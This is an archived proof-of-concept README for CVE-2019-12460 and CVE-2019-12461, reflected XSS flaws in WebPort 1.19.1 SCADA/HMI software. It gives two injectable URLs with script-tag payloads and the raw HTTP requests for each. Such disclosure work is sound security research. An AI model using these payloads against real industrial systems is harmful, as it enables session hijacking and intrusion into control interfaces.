Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2019-12460 PoC — Web Port 跨站脚本漏洞

Source
https://github.com/EmreOvunc/WebPort-v1.19.1-Reflected-XSS
Associated Vulnerability
Title:Web Port 跨站脚本漏洞 (CVE-2019-12460)
Description:Web Port是一套基于Web的SCADA(数据采集与监控系统)和HMI(人机界面)系统。 Web Port 1.19.1版本中存在跨站脚本漏洞。该漏洞源于WEB应用缺少对客户端数据的正确验证。攻击者可利用该漏洞执行客户端代码。
Description
CVE-2019-12460|Reflected XSS in WebPort-v1.19.1 impacts users who open a maliciously crafted link or third-party web page.
Readme
# WebPort-v1.19.1-Reflected-XSS
Reflected XSS in [WebPort-v1.19.1](http://webport.se) impacts users who open a maliciously crafted link or third-party web page.

# CVE-2019-12460
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12460

# PoC-1
To exploit vulnerability, someone could use **'http://[server]:8090/access/setup?type="</script><script>alert('xss');</script><script>'** request to impact users who open a maliciously crafted link or third-party web page.

```
GET /access/setup?type=%22%3C/script%3E%3Cscript%3Ealert(%27xss%27);%3C/script%3E%3Cscript%3E HTTP/1.1
Host: 172.16.165.182:8090
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: __tiny_sessid=6361847c-952b-45ba-874c-71f1794ffe37
Upgrade-Insecure-Requests: 1
```

![alt tag](https://emreovunc.com/blog/en/WebPort-Reflected-XSS-01.png)

# CVE-2019-12461
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12461

# PoC-2
To exploit vulnerability, someone could use **'http://[server]:8090/log?type="</script><script>alert('xss');</script><script>'** request to impact users who open a maliciously crafted link or third-party web page.
  
```
GET /log?type=%22%3C/script%3E%3Cscript%3Ealert(%27xss%27);%3C/script%3E%3Cscript%3E HTTP/1.1
Host: 172.16.165.182:8090
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: __tiny_sessid=6361847c-952b-45ba-874c-71f1794ffe37
Upgrade-Insecure-Requests: 1
```

![alt tag](https://emreovunc.com/blog/en/WebPort-Reflected-XSS-02.png)
File Snapshot

 [4.0K]  /data/pocs/c51aef2b8a0dbbae0cc285bd45b46e01023ba7af
└── [1.9K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.